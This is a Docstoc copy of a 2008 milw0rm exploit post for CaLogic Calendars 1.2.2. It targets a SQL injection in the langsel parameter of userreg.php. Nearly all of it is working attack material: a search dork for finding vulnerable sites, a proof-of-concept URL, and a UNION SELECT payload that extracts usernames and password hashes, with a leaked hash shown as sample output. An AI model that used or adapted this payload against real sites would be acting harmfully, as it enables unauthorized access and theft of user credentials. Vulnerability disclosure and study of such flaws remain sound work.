Docstoc

CaLogic Calendars 1.2.2 langsel Remote SQL Injection Vulnerability

Document Sample
CaLogic Calendars 1.2.2 langsel Remote SQL Injection Vulnerability Powered By Docstoc
					                    CaLogic Calendars 1.2.2 langsel Remote SQL Injection Vulnerability                            Page 1/1
  1    /−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−\
  2    \                                                               /
  3    /       CaLogic Calendars V1.2.2 Remote SQL injection           \
  4    \                                                               /
  5    \−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−/
  6
  7
  8    [*] Author    : His0k4 [ALGERIAN HaCkEr]
  9
  10   [*] Dork      : "CaLogic Calendars V1.2.2"
  11
  12   [*] POC        : http://localhost/[SCRIPT_PATH]/userreg.php?langsel={SQL}
  13
  14   [*] Example    : http://localhost/[SCRIPT_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM
        clc_user_reg where uid=CHAR(49)−−
  15
  16   [*] Note       : You can see the results (user name & password) in "SQL String" line for example {SQL String: select
       * from clc_lang_admin:21232f297a57a5a743894a0e4a801fc3 where keyid=’urth’}
  17
  18   −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
  19   [*] Greetings : Str0ke, all friends & muslims HaCkeRs...
  20
  21   # milw0rm.com [2008−05−13]




His0k4                                                                                                             05/13/2008

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:344
posted:5/24/2010
language:English
pages:1